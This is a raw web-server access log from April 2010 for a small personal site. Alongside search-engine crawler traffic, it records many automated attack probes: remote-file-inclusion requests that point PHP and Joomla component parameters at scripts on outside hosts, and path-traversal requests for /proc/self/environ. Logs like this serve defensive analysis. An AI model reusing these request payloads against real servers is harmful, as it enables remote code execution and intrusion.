137.101.192.15 - - [20/Apr/2010:20:31:38 -0500] "GET /logs/access_log.1225238400//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
189.78.119.115 - - [20/Apr/2010:20:32:39 -0500] "GET /logs//port.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
189.78.119.115 - - [20/Apr/2010:20:32:48 -0500] "GET //port.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.250.255.243 - - [20/Apr/2010:20:32:54 -0500] "GET /logs/access_log.1167523200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.80.193.27 - - [20/Apr/2010:20:33:47 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={B350D55A-2732-4d26-A11F-621283B2F099}; .NET CLR 2.0.50727)"
208.43.48.82 - - [20/Apr/2010:20:34:27 -0500] "GET /logs/?sourcedir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 200 2583 "-""Mozilla/5.0"
208.43.48.82 - - [20/Apr/2010:20:34:27 -0500] "GET /logs/access_log.1219708800/?sourcedir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
208.43.48.82 - - [20/Apr/2010:20:34:28 -0500] "GET /?sourcedir=http://hd-win.com/articles/ssh/sc1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:34:48 -0500] "GET /logs/access_log.1194307200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:20:38:03 -0500] "GET /logs/access_log.1164672000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.41 - - [20/Apr/2010:20:39:25 -0500] "GET /logs/access_log.1158278400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:20:40:36 -0500] "GET /logs/access_log.1228176000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.138 - - [20/Apr/2010:20:40:55 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.232.195.131 - - [20/Apr/2010:20:41:15 -0500] "GET /logs/index.php?option=com_travelbook&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [20/Apr/2010:20:41:16 -0500] "GET /logs/index.php?option=com_travelbook&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [20/Apr/2010:20:41:16 -0500] "GET /index.php?option=com_travelbook&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
220.232.195.131 - - [20/Apr/2010:20:41:17 -0500] "GET /index.php?option=com_travelbook&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""-"
208.115.111.248 - - [20/Apr/2010:20:41:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [20/Apr/2010:20:43:09 -0500] "GET /logs/access_log.1202947200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:20:44:18 -0500] "GET /logs/access_log.1228867200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:20:45:07 -0500] "GET /logs/access_log.1171065600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:20:46:53 -0500] "GET /logs/access_log.1247184000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:20:49:26 -0500] "GET /logs/access_log.1164067200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:20:49:32 -0500] "GET /logs/access_log.1215561600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:20:51:20 -0500] "GET /logs/access_log.1155081600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:20:52:38 -0500] "GET /logs/access_log.1175040000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:20:55:11 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
189.78.119.115 - - [20/Apr/2010:20:56:50 -0500] "GET /logs//index1.php?dat=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
189.78.119.115 - - [20/Apr/2010:20:56:57 -0500] "GET //index1.php?dat=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
87.250.255.243 - - [20/Apr/2010:20:57:05 -0500] "GET /logs/access_log.1194912000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
189.78.119.115 - - [20/Apr/2010:20:58:28 -0500] "GET /logs//index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
189.78.119.115 - - [20/Apr/2010:20:58:32 -0500] "GET /logs//index2.php?url_page=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
189.78.119.115 - - [20/Apr/2010:20:58:34 -0500] "GET //index0.php?show=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
189.78.119.115 - - [20/Apr/2010:20:58:39 -0500] "GET //index2.php?url_page=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
216.105.40.177 - - [20/Apr/2010:20:58:44 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""WebRingChecker/1.71 LWP/5.79"
87.250.255.243 - - [20/Apr/2010:20:59:00 -0500] "GET /logs/access_log.1182816000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:21:01:34 -0500] "GET /logs/access_log.1209513600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:21:03:30 -0500] "GET /logs/access_log.1190160000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:21:05:25 -0500] "GET /logs/access_log.1200873600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.227.141.53 - - [20/Apr/2010:21:06:56 -0500] "GET //logs/agenda.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:21:06:56 -0500] "GET /logs/access_log.1262822400//logs/agenda.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:21:06:56 -0500] "GET /logs//logs/agenda.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:07:58 -0500] "GET /logs/access_log.1172275200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
189.78.119.115 - - [20/Apr/2010:21:08:15 -0500] "GET /logs//index1.php?site=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
189.78.119.115 - - [20/Apr/2010:21:08:22 -0500] "GET //index1.php?site=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
87.250.255.243 - - [20/Apr/2010:21:09:54 -0500] "GET /logs/access_log.1216857600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:21:11:10 -0500] "GET /logs/access_log.1230508800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.53 - - [20/Apr/2010:21:11:25 -0500] "GET /logs/access_log.1255046400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.227.141.53 - - [20/Apr/2010:21:11:55 -0500] "GET //logs/agenda.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:21:11:55 -0500] "GET /logs//logs/agenda.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:21:11:55 -0500] "GET /logs/access_log.1262822400//logs/agenda.php3?rootagenda=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:14:21 -0500] "GET /logs/access_log.1188432000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:21:16:16 -0500] "GET /logs/access_log.1187654400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:21:17:34 -0500] "GET /logs/access_log.1171670400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.216.43.133 - - [20/Apr/2010:21:19:42 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:19:42 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:19:42 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:19:55 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
208.115.111.248 - - [20/Apr/2010:21:19:58 -0500] "GET /logs/access_log.1213747200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/Apr/2010:21:20:00 -0500] "GET /logs/access_log.1216252800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/Apr/2010:21:20:02 -0500] "GET /logs/access_log.1238025600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/Apr/2010:21:20:05 -0500] "GET /logs/access_log.1239840000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/Apr/2010:21:20:07 -0500] "GET /logs/access_log.1246060800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [20/Apr/2010:21:20:07 -0500] "GET /logs/access_log.1220486400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.216.43.133 - - [20/Apr/2010:21:20:39 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:20:39 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:20:39 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:20:53 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
207.46.13.48 - - [20/Apr/2010:21:21:27 -0500] "GET /logs/?S=A HTTP/1.1" 200 2583 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:21:22:02 -0500] "GET /logs/access_log.1257724800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.216.43.133 - - [20/Apr/2010:21:22:42 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:22:42 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:22:42 -0500] "GET /logs/access_log.1268611200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:23:01 -0500] "GET /logs/access_log.1221696000//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:23:18 -0500] "GET /logs/access_log.1211155200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.185 - - [20/Apr/2010:21:23:27 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:21:26:31 -0500] "GET /logs/access_log.1213920000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:21:29:42 -0500] "GET /logs/access_log.1158624000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:21:30:24 -0500] "GET /?M=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.132.3 - - [20/Apr/2010:21:31:31 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:21:31:31 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:21:31:31 -0500] "GET /logs/access_log.1232150400//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:31:37 -0500] "GET /logs/access_log.1234742400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [20/Apr/2010:21:31:39 -0500] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:21:31:39 -0500] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:21:31:39 -0500] "GET /logs/access_log.1265241600//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
207.46.13.137 - - [20/Apr/2010:21:32:26 -0500] "GET /logs/access_log.1243296000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.106.132.3 - - [20/Apr/2010:21:32:31 -0500] "GET /logs/access_log.1227916800//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:33:32 -0500] "GET /logs/access_log.1196812800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.216.43.133 - - [20/Apr/2010:21:33:51 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:33:51 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:33:54 -0500] "GET /logs/access_log.1268611200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:34:13 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:34:13 -0500] "GET /logs/access_log.1268611200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:34:13 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:35:27 -0500] "GET /logs/access_log.1161561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.216.43.133 - - [20/Apr/2010:21:36:25 -0500] "GET /logs/access_log.1217635200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:36:44 -0500] "GET /logs/access_log.1217635200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:38:39 -0500] "GET /logs/access_log.1254096000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.254.228.21 - - [20/Apr/2010:21:40:45 -0500] "GET //micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
166.137.136.61 - - [20/Apr/2010:21:41:06 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "-""Bing/1.1 CFNetwork/459 Darwin/10.0.0d3"
209.216.43.133 - - [20/Apr/2010:21:41:43 -0500] "GET /logs/access_log.1265241600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:41:43 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.216.43.133 - - [20/Apr/2010:21:41:43 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:41:50 -0500] "GET /logs/access_log.1175558400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.60.49.18 - - [20/Apr/2010:21:42:56 -0500] "GET /errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
65.60.49.18 - - [20/Apr/2010:21:42:56 -0500] "GET /logs/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.60.49.18 - - [20/Apr/2010:21:42:56 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.60.49.18 - - [20/Apr/2010:21:43:10 -0500] "GET /errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
65.60.49.18 - - [20/Apr/2010:21:43:10 -0500] "GET /logs/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.60.49.18 - - [20/Apr/2010:21:43:10 -0500] "GET /logs/access_log.1212969600/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.93.196.11 - - [20/Apr/2010:21:43:38 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.93.196.11 - - [20/Apr/2010:21:43:38 -0500] "GET /logs/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.93.196.11 - - [20/Apr/2010:21:43:38 -0500] "GET /errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:21:43:42 -0500] "GET /logs/access_log.1271030400//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:21:43:42 -0500] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:21:43:42 -0500] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.60.49.18 - - [20/Apr/2010:21:43:58 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:44:24 -0500] "GET /logs/access_log.1208131200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.93.196.11 - - [20/Apr/2010:21:44:47 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
173.200.47.153 - - [20/Apr/2010:21:44:50 -0500] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
173.200.47.153 - - [20/Apr/2010:21:44:50 -0500] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
173.200.47.153 - - [20/Apr/2010:21:44:50 -0500] "GET /logs/access_log.1235779200//mygallery/myfunctions/mygallerybrowser.php?myPath=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:21:44:58 -0500] "GET /errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:21:44:58 -0500] "GET /logs/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:21:44:58 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:21:45:34 -0500] "GET /errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:21:45:35 -0500] "GET /logs/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:21:45:35 -0500] "GET /logs/access_log.1212969600/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:21:45:40 -0500] "GET /logs/access_log.1236038400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.93.196.11 - - [20/Apr/2010:21:45:56 -0500] "GET /errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.93.196.11 - - [20/Apr/2010:21:45:56 -0500] "GET /logs/access_log.1212969600/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.93.196.11 - - [20/Apr/2010:21:45:56 -0500] "GET /logs/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.34.175.15 - - [20/Apr/2010:21:46:31 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.254.228.21 - - [20/Apr/2010:21:47:10 -0500] "GET /logs/access_log.1268265600//micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 348 "-""libwww-perl/5.805"
121.254.228.21 - - [20/Apr/2010:21:47:11 -0500] "GET //micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
121.254.228.21 - - [20/Apr/2010:21:47:12 -0500] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.805"
87.250.255.243 - - [20/Apr/2010:21:48:13 -0500] "GET /logs/access_log.1183680000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [20/Apr/2010:21:48:13 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:21:48:13 -0500] "GET /logs/access_log.1212969600%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:21:48:13 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:21:48:13 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
